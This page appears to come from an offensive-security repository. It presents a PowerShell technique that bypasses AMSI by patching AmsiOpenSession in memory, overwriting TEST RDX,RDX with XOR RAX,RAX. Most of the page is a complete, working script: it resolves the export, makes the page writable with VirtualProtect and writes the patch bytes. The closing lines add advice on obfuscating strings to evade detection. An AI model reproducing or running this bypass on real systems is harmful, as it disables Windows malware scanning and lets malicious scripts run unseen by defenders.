AMSI-Bypass-AmsiOpenSession_Assembly

With this PowerShell code it is possible to bypass AMSI in the current process. Instead of tampering with the data AMSI acts on, we modify the assembly instructions themselves, a technique known as binary patching. Hotpatching the code forces AmsiOpenSession to fail even when the data structures passed to it are valid. The 3-byte instruction TEST RDX,RDX (48 85 D2), which checks whether the session pointer argument is NULL, is overwritten with XOR RAX,RAX (48 31 C0). XOR always sets the zero flag, so the conditional jump that follows the test takes the error branch: AmsiOpenSession returns a failure HRESULT instead of a session, and the script content never reaches AmsiScanBuffer.

Command reference:

1. Obtain the memory address of AmsiOpenSession inside the loaded amsi.dll (lookup function).

2. Change the memory protection of the page where AmsiOpenSession lives so it is writable (lookup with DelegateType, then VirtualProtect).

3. Overwrite the three bytes at that location: TEST RDX,RDX (48 85 D2) becomes XOR RAX,RAX (48 31 C0) (copy function).
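The three steps above carried out end to end, as an added worked example; this is not the page's own script (which is not reproduced here) nor the code of the referenced repository. It uses Add-Type P/Invoke declarations instead of the reflection-based lookup helpers the command reference names, and assumes 64-bit Windows PowerShell 5.1 with amsi.dll already loaded in the process. The Win32 class name and the 64-byte search window are choices made for this example. It also adds the check a practitioner wants before writing to code pages: it locates TEST RDX,RDX rather than assuming a fixed offset, and refuses to patch if the byte pattern is not found, since the function prologue differs between amsi.dll builds.

```powershell
# Added example: patch TEST RDX,RDX -> XOR RAX,RAX in amsi.dll!AmsiOpenSession.
# Assumes 64-bit Windows PowerShell 5.1; "Win32" is a name chosen for this example.
$win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")] public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
    [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type -TypeDefinition $win32

# Step 1: address of AmsiOpenSession in the amsi.dll already mapped into this process
$hAmsi = [Win32]::GetModuleHandle("amsi.dll")
if ($hAmsi -eq [IntPtr]::Zero) { throw "amsi.dll is not loaded in this process" }
$fn = [Win32]::GetProcAddress($hAmsi, "AmsiOpenSession")
if ($fn -eq [IntPtr]::Zero) { throw "AmsiOpenSession export not found" }

# Find TEST RDX,RDX (48 85 D2) within the first 64 bytes; the offset varies per amsi.dll build
$window = 64
$prologue = New-Object byte[] $window
[System.Runtime.InteropServices.Marshal]::Copy($fn, $prologue, 0, $window)
$offset = -1
for ($i = 0; $i -le ($window - 3); $i++) {
    if ($prologue[$i] -eq 0x48 -and $prologue[$i + 1] -eq 0x85 -and $prologue[$i + 2] -eq 0xD2) {
        $offset = $i
        break
    }
}
if ($offset -lt 0) { throw "TEST RDX,RDX not found in AmsiOpenSession; layout differs, not patching blindly" }
$target = [IntPtr]::Add($fn, $offset)

# Step 2: make the three bytes writable (PAGE_EXECUTE_READWRITE = 0x40), remembering the old protection
$size = [UIntPtr]::new(3)
$oldProtect = [uint32]0
if (-not [Win32]::VirtualProtect($target, $size, 0x40, [ref]$oldProtect)) { throw "VirtualProtect failed" }

# Step 3: write XOR RAX,RAX (48 31 C0); ZF is now always set, so the following JE takes the error branch
$patch = [byte[]](0x48, 0x31, 0xC0)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $target, $patch.Length)

# Restore the original page protection so the code page is not left RWX
$dummy = [uint32]0
[void][Win32]::VirtualProtect($target, $size, $oldProtect, [ref]$dummy)
Write-Host ("Patched AmsiOpenSession+0x{0:X} in this process" -f $offset)
```

The patch only affects the process it runs in and disappears on restart. Add-Type compiles the C# to a temporary assembly on disk, which is one reason the page's command reference resolves the APIs through reflection and delegate types instead; the literal strings "amsi.dll" and "AmsiOpenSession" in a script are also commonly flagged on their own, which is why public variants of this bypass typically obfuscate them.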
References:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell#Patching-AMSI-AmsiOpenSession